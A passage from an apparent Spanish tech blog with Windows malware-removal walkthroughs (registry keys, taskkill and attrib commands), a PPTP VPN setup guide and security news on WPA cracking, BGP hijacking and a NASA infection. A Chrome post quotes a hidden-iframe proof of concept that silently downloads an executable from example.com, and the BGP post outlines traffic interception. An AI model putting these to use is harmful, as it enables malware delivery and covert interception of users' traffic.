Carpeta windows abre al iniciar.

Hoy luego de haber desinfectado una Pc, termine con un problema tal ves comun para algunos; o alarmante para otros. Pero la impresion me llevo a estar un buen rato frente a la Pc.

Sintomas:

Al iniciar windows este abre automaticamente al windows explorer, poniendo en la ruta de direccion a windows.

folder windows startup

Acciones realizadas:

En principio recurri al msconfig y observar la pestaña de Inicio, no habia nada extraño.

Luego buscamos en el regedit cadenas que puedan abrir la aplicacion, con comodines: %windir%\explorer.exe Pero estas eran necesarias para windows.

Luego busque algun script o aplicacion en el directorio de windows, y system32. Ninguno tenia propiedades virales.

Por ultimo revise con aplicacions como ccleaner que no dio solucion.

Solucion:

Luego de buen tiempo, use un programa que reportara aplicaciones que hacen uso del registro. Tal vez para algunos este programa sea muy usado para reportes y observados por expertos en malware.

Asi que usamos el programa: HijackThis

Una vez abierto examinamos el reporte y tenemos el objetivo localizado:

target found

Ahi esta la variable del directorio windows, con la accion a ejecutarse.

Asi que marcamos con un check y le damos fix checked en el hijackthis.

Reiniciamos y tenemos solucionado el problema.

Red Privada virtual gratuita en Ubuntu

Bien leyendo unos feeds del sitio neoteo, me intereso el tema de la navegacion privada en la red.

Como es de saber una navegacion de este tipo cifra paquetes al momento de conectarse en la red haciendo seguro nuestras conecciones. En este caso el sitio que ofrece este buen servicio es ItsHidden en su web podran ver detalles tecnicos, como un cifrado en 128 bits para algo gratuito es muy buena oferta.

Bien las configuraciones disponibles que veran en la web de ItsHidden esta relacionada con windows xp, windows vista, Mac, y Linux.

En nuestro caso vamos a crearnos una cuenta para usar el servicio, una vez registrados lo podran activar via e-mail, y posteriormente en nuestro O.S Linux Ubuntu pasaremos a instalar paquetes PPTP. Abrimos para ello la terminal:

$ sudo apt-get install network-manager-pptp

Ahora reseteamos el gestor de redes

primero matamos el proceso:

$ sudo killall NetworkManager

segundo volvemos a iniciar el gestor en segundo plano:

$ sudo NetworkManager &

Ahora creamos nuestra coneccion VPN, click derecho en icono de red y editar concecciones. Seguido vamos a la pestaña de VPN, seguido ponemos agregar donde agregaremos PPTP.

Y rapidamente ponemos nuestros datos, pero antes configuraremos algo adicional para ello vamos a avanzado y hablitamos con un check la encriptacion MPPE. Y aceptar:)

Podran ver en sitios de deteccion de ip que estan asignados a otras parte del mundo, disfruten

Elimina virus y aparece nuevamente

Bien en mi caso suele ocurrir en raras veces pero en otras pc’s es constante ver estos problemas, que resulta fastidiando al usuario

Para empezar debemos de identificar el proceso de nuestro antivirus, tener en cuenta que un antivirus pueda tener distintos procesos en el caso de Nod32 en la version 4 tenemos presente el egui.exe y el ekrn.exe. El primero solo es aplicacion grafica accesible para todo usuario el segundo es el antivirus en si; que no se podra eliminar sencillamente.

Pero como los mensajes son reportados por la aplicacion grafica eliminaremos egui.exe. Accedemos al administrador de Tareas [Ctrl + Alt + Supr ] o usar el comando tasklist en Ms-Dos. Si usan el administrador de tareas basta con identificar el egui.exe y darle un click derecho seguidamente eliminar proceso. en Tasklist de Ms-Dos usamos comando:

taskkill /f /im egui.exe

Bien el mensaje desaparece ahora si nos ponemos a eliminar manualmente ya que nuestro antivirus no puede hacerlo por si solo. Asi que deben de identificar al virus o malware que este dando problemas. En mi caso el antivirus lo identifico y me dio la ruta de donde se encuentra este Virus

Pero primero eliminemos su proceso y asi al menos darle menos efectividad a nuestro malware.

taskkill /f /im wswisher.exe

Seguidamente eliminamos sus modificaiones en el registro (regedit):

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
C:\Windows\wswisher.exe = wswisher

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
wswisher Module = wswisher.exe

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Terminal Server\Install\Software\Microsoft\Widows\CurrentVersion\Run]
wswisher Module = wswisher.exe

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AutorizhedApplications]
C:\WINDOWS\wswisher.exe

[HKEY_USERS\S-4-5-21-1715567821-796845957-1801674531-1004\Software\Microsoft\Windows\ShellNoRoam\MUICACHE]
C:\WINDOWS\wswisher.exe = wswisher.exe

Por ultimo accedemos al directorio en el que se encuentra el malware y lo eliminamos .

C:\WINDOWS>del /f /q /s /a wswisher.exe

Bien eso fue sensillo hay otros malwares que no nos dejaran ni eliminar procesos, o se vuelven a reproducir teniendo nuevamente el proceso activo. En fin desde ya iremos publicando mas sobre el comportamiento de un malware

Eliminando cvasds1.dll – no abre windows live messenger

Hoy recibi un usb, por respetar la amistad le digo que use la pc.
Observo mientras tanto… reconoce el USB y con un doble click su USB y boom se abre una ventana, dije VIRUS!!! y resulto ser muy grave, los antivirus no lo detectaban ni lo tomaban en cuenta. Ahora iba usar messenger y boom error saliendo un mensaje clasico de error con algun modulo de memoria asi que era grave este tipo de errores son explotados para muchas veces romper la seguridad de nuestro sistema operativo, tipico de un troyano

Bien manos a la obra, en esta ocacion el proceso no lo sabemos ya que el error esta asociado a un .dll que no tiene nada que ver con el messenger. observamos la unidad usb y veamos que tipo de espcimen han instalado a nuestra PC

h:\>attrib
SHR C:\mb9x.exe
SHR C:\autorun.inf

bingo el clasico autorun, parece curioso que un autorun no sea detectado por el AV. y esto se debe a que hay tecnicas de ocultar o hacer indetectable a un virus por ejemplo cambiando sus flags. Asi que a veces uno se rompe la cabeza preguntandose por que no detecto un clasico autorun argg!!!

bien veamos que tiene este inofensivo archivo

h:\>edit autorun.inf
…
open=mb9bx.exe
…

Ahora si tenemos un poco de info, asi que tratamos de quitar atributos

h:\>attrib -r -s -h mb9bx.exe

bien todo funciono y despues de 5 segundos vuelve a recuperar sus atributos. Asi que no trabaja solo veamos entonces los temporales

De seguro en ejecutar no observaremos nada malaiciso asi que vayamos a ver desde una terminal:

c:\>cd DOCUME~1\ADMINI~1\CONFIG~1\Temp
C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp>attrib
SHR C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\cvasds0.dll
SHR C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\cvasds1.dll
SHR C:\DOCUME~1\ADMINI~1\CONFIG~1\Temp\herss.exe

wow 3 virus mas asi que quitar attributos y a borrarlos

attrib -r -s -h cvasds0.dll
attrib -r -s -h cvasds1.dll
attrib -r -s -h herss.exe
del /f /q /s /a cvasds0.dll
del /f /q /s /a cvasds1.dll
del /f /q /s /a herss.exe

Bien en el caso de cvasds0.dll no se va a eliminar ya que es el file principal para su funcionamiento asi que con las demas este ya no tiene efecto en nuestro sistema (despues eliminaremos). Ahora eliminaremos autorun.inf y mb9bx.exe

En mi caso al hacer attrib ya no figuraba mb9bx.exe asi que me da a entender que debia estar asociad a una de las dll’s. Pero el autorun.inf si que no se borrara facilmente ello se debe que este usando el registro para autoregenerarse asi que veamos el registro

windows + r –> regedit

buscamos y borramos las siguiente cadena:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
cdoosoft = “%Temp%\herss.exe”

Borramos todos los temporales (windows + r –> %temp%) posibles y reniciamos la PC, y si preguntan que pasa con el autorun.inf y cvasds0.dll eso viene despues.

Bien una vez dentro del sistema borramos el cvasds0.dll ya sea desde ejecutar o terminal Ahora borraremos autorun.inf de todos las unidades que tengamos en mi caso lo hago de esta manera:

@echo off
cd \
attrib -r -s -h autorun.inf
del /f /q /s /a autorun.inf
d:
attrib -r -s -h autorun.inf
del /f /q /s /a autorun.inf
e:
attrib -r -s -h autorun.inf
del /f /q /s /a autorun.inf
pause>null
exit

este script la edito en notepad y luego la guardo como file.bat

y por ultimo esta infeccion a cambiado algunas propieades de nuestra pc, si se an dado cuenta no pueden ver archivos ocultos desde opciones de carpeta

Modifiquemos lo modificado en regedit:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
CheckedValue = 0×00000000

entonces el valor dword la cambiaremos a 1:

CheckedValue = 0×00000001

Para ello una vez ubicado en la cadena anteriormente comentada damos un enter en checkedvalue y el 0 modificaremos por 1

Bueno con esto ya estamos un 80 % sin este molesto virus

Luego ire agregando informacion adicional ya que esta infeccion tiene muchas cadenas modificadas, esperemos que no sean graves

Ah por ultimo ya estamos en windows live messenger charlando con unos amigos

Eliminando Zipm12.exe

Zipm12.exe un malware que esta asociado a internet chat gusano. que no tengo detallado aun que es lo que ocasiona en el sistema por que su nivel de riesgo es baja, aun asi estaba experimentando congelamiento del mouse y aletariomente en el tiempo de congelamiento se  descargaba automaticamente una ejecutable inyectado en una foto. por fortuna estaba con un gestor de descargas que grabo el link y dandome asi la oportunidad de no ser infectado del todo. 

para poder asegurarnos si este virus esta ejecutandose, accederemos al administrador de tareas [Ctrl + Alt + Supr] Siendo el proceso Zipm12.exe

En caso de que el administrador de tareas esta desabilitado por infeccion viral o permisos de administrador, veremos los procesos en  la terminal [Ms-Dos] con el comando tasklist.

Zipm12.exe       3144 Console   0   8,892 KB

Bien con esto nos aseguramos de que esta en ejecucion
Asi que eliminamos el proceso para que deje de ejcutarse. Usamos comando Taskkill /f /im [process_name]

C:\>taskkill /f /im Zipm12.exe

Ahora buscamos donde se encuentra alojado las cadenas del Zipm12.exe
Abrimos el regedit (Teclas -> Windows + R | escribis:  regedit)
Buscamos las siguientes cadenas:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Zip Manager XP PRO 2009 = “Zipm12.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run]
Zip Manager XP PRO 2009 = “Zipm12.exe”

borramos las cadenas anteiromente mencionadas.

Cadenas adicionales a borrar:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUIcache]
C:\WINDOWS\system32\Zipm12.exe = “Zipm12″

[HKEY_LOCAL_MACHINE\Software\Microsoft\Shared Tools\MSconfig\Starupreg]
Borramos todo el directorio de Zip Manager XP PRO 2009

[HKEY_CURRENT_USERS\S-1-5-21-1715567821-796845957-1801674531-1004\Software\Microsoft\Windows\ShellNoRoam\MUICache]
C:\WINDOWS\system32\Zipm12.exe = “Zipm12.exe”

ahora buscamos la ubicacion del archivo, en la terminal [Ms-DOs]nos ubicamos en system32.

c:\Windows\system32>attrib | more
SHR     C:\WINDOWS\system32\Zipm12.exe

quitamos propiedades de sistema oculto y lectura:

c:\Windows\system32>attrib -r -s -h Zipm12.exe

y borramos esta aplicacion:

c:\Windows\system32>del /f /q Zipm12.exe

para asegurarnos de que no vuelva a ejecutarse borramos temporales
windows + r –> %temp%

Por ultimo reiniciar la PC

Eset presenta Eset Security University

Eset

Luego de leer feeds de l sitio infospyware (excelente web frente a soluciones de infecciones informaticas), acaban de publicar un interesante aporte para los usuarios del antivirus Nod32 ahora ya en su version 4.

Ahora eset nos presenta la opotunidad de conocer mas sobre infecciones y como enfretarlos o como evitarlos, con el novedoso Eset Security Universty que se encuentra dirigido a empleados de alguna empresa relacionada al uso de este producto, como ellos mismos describen: Seguridad para PyMEs.

Pero para aquellos usuarios finales tanto de uso domestico, estudiantes, etc nos presenta la Plataforma Educativa ESET, que ademas de aprender sobre los virus, nos recompensa con certificaciones y premios que veran en dicha web.

Ahora estoy por mi parte en la Plataforma Educativa que esta interesante

WPA es ahora crackeada

Investigadores de seguridad dicen haber desarrollado una manera parcial de crackear la encriptacion estandar de wi-fi WPA ques es usado en algunas redes inalambricas.

El atacke sera practicamente discutido en la conferencia PacSec en tokio. Erik tews mostrara como crackea la encriptacion wpa, leyendo los datos que son enviados de un router a una laptop. el ataque tambien puede ser usado para enviar informacion falsa a un cliente conectado al router.

Para ello Tews, y Martin Beck buscaran como romper el TKIP, protocolo usado por WPA, en un tiempo corto relativamente: 12 a 15 minutos dice Dragos Ruiu, organizador de la conferencia PacSec

Ademas para obtener dicha key no hacen uso necesario de diccionarios, el truco esta en que los investigadores primero descubriran como engañar a un router WPA enviandoles gran cantidad de datos. pero esta tecnica tambien esta combinada con una matematica avanzada, que permite los deciframientos WPA mucho mas rapidos que cualquier intento anterior, dice Ruiu

Tews esta pensando publicar el trabajo criptografico en una revista academica en los proximo meses, alguna de las herrmientas usadas se mencionan Aircrack-ng.

Ahora despues de la publicacion de articulo mas vale que nos cambiemos a encriptacion WPA2, Dios nos proteja

Dos errores en el explorador Chrome

El nuevo cliente web diseñado por Google lanzado el dia martes “Chrome“, Es vulnerable primero ante un error de cabeceras indefinidas dentro de un archivo dll llamado “Chrome.dll”, el error se observa claramente al tipear :% mostrando un mensaje: “Whoa! Google Chrome has crashed. Restart now?“.

credito original: http://evilfingers.com/advisory/google_chrome_poc.php

Y otro error, Chrome permite descargar archivos ejecutables automaticamente sin ser comprobados por el usuario, este POC se basa en un sencilla etiqueta iframe.

<script>

document.write(‘<iframe src=”http://www.example.com/hello.exe” frameborder=”0″ width=”0″ height=”0″>’);

</script>

fuente:  www.securiteam.com

Otro agujero en Internet

Dos investigadores de seguridad informática han demostrado una técnica para interceptar tráfico en forma casi indetectable. La técnica, de tipo man-in-the-middle, usa el protocolo BGP para desviar tráfico en cualquier lugar del mundo hacia la estación de monitorización y luego lo envía (posiblemente modificado) hacia su destino.

Peter Zatko (Mudge), uno de los investigadores, declaró: “Es un problema enorme. Es un problema al menos tan grande como el de DNS, si no más grande”. Peter Zatko es un esperto en seguridad y ex miembro del grupo L0pht y en 1998 testificó ante el congreso estadounidense diciendo que podría detener totalmente Internet en 30 minutos utilizando un ataque BGP similar. También instruyó a agencias de inteligencia sobre la posible utilización de BGP para monitorizar tráfico remoto sin necesidad de colaboración por parte de ningún ISP…

Esto podria ser usado para espionaje corporativo, una nacion-estado espiando o incluso agencias de inteligencia buscando datos de internet sin cooperacion de los ISPs

La técnica descrita intercepta el tráfico por dirección de destino, y no siempre es posible desviar tráfico que ocurre dentro de un mismo ISP. El protocolo BGP mantiene tablas de rutas para encontrar la más eficiente hacia un destino dado. Pero las rutas están basadas en las máscaras de red y la más restrictiva (la más específica) gana. Para interceptar el tráfico, todo lo que tiene que hacer un atacante es publicar un rango de IPs más pequeño que el que está publicado por su legítimo dueño. La publicación se propaga en minutos a todo el mundo y el atacante comenzará a recibir datos destinados a los rangos IPs publicados.

Si sólo se hiciera esto, sería muy fácilmente detectable ya que el tráfico “desaparecería” hacia otra red en vez de llegar a su destino. Esto es más o menos lo que pasó este año cuando un ISP de Pakistán desvió por error todo el tráfico de YouTube (en realidad el tráfico hacia YouTube) hacia direcciones inexistentes. Obviamente todo el mundo se dio cuenta.

Lo innovador de la técnica presentada es la capacidad de poder redirigir el tráfico hacia su destino final después de ser interceptado, algo que normalmente no sería posible ya que las tablas BGP harían que el tráfico volviese al atacante. Sin embargo, se utiliza otra capacidad del protocolo BGP llamada “AS path prepending“, que permite seleccionar algunos routers para que no acepten la publicación BGP maliciosa hecha por el atacante y lograr de ese modo que tengan las tablas BGP originales. Luego es cosa de enviar el tráfico por medio de éstos routers y llegará correctamente a destino.

Si los datos siempre llegan a destino correctamente, ¿quién va a notar algo?

En todo el proceso no se aprovecha ninguna vulnerabilidad, ningún fallo del protocolo, ningún error de software. Simplemente se saca provecho a la arquitectura BGP que está basada en la confianza mutua.

Anton Kapela, el otro investigador, dijo que los ISP pueden evitar este tipo de ataques utilizando filtros. El problema es que se requiere una gran cantidad de filtros y trabajar en coordinación con todos los otros ISPs. También tendría un alto costo de mantenimiento. Por todo esto, Kapela opina que una solución basada en filtrado no va a prosperar.

Otra solución propuesta se basa en la autenticación de los “dueños” de los bloques IPs. Una solución de éste tipo requeriría la utilización de certificados por parte de los ISPs. Sin embargo, aunque se evitaría el desvío de tráfico en el primer salto en una ruta, lo que evitaría desvíos accidentales como el de Pakistán, este esquema no evitaría el desvío del segundo o tercer salto en una ruta.

Stephen Kent y sus colegas de BBN Technologies, han desarrollado Secure BGP (SBGP), que requiere que cada router BGP firme digitalmente todas sus rutas publicadas con una clave privada. Esto evitaría totalmente el desvío malintencionado de tráfico, pero lamentablemente los routers actuales no tienen ni la memoria ni la capacidad de procesamiento para generar y validar firmas, por lo que una implementación masiva de SBGP requeriría el cambio a gran escala de todos los routers involucrados, algo que ni los ISP ni los fabricantes de routers se ven motivados a hacer por ahora.

Source: www.kriptopolis.org www.wired.com

Nasa infectado por virus informatico

LaNASA ha confirmado que varias computadoras portátiles de la estación espacial internacional (ISS) han sido infectadas por un virus en julio. Según NASA, en la estación espacial no había sistemas críticos, por lo que la infección viral no es grave.

“No es la primera vez que hemos tenido gusanos o virus. No sucede con frecuencia, pero no es la primera vez que ocurre”, declaró la portavoz de NASA, Kelly Humphries a la publicación Wired.

NASA no desea revelar el nombre del virus, pero según diversas fuentes se trataría de W32.Gamina.AG, un gusano algo antiguo, que intenta robar informaciones de inicio de sesiones de juegos en línea.

Por el momento es incierta la forma en que el programa llegó al espacio. En la estación espacial no hay conexión directa a Internet, pero su tripulación puede enviar y recibir correo electrónico mediante una conexión digital especial, que en todo caso analiza todos los archivos en búsqueda de códigos malignos.

Por lo tanto, la infección podría haber quedado instalada en las computadoras mientras estas estaban en la tierra, o alternativamente el gusano puede haber sido subido a una de las máquinas mediante un dispositivo USB.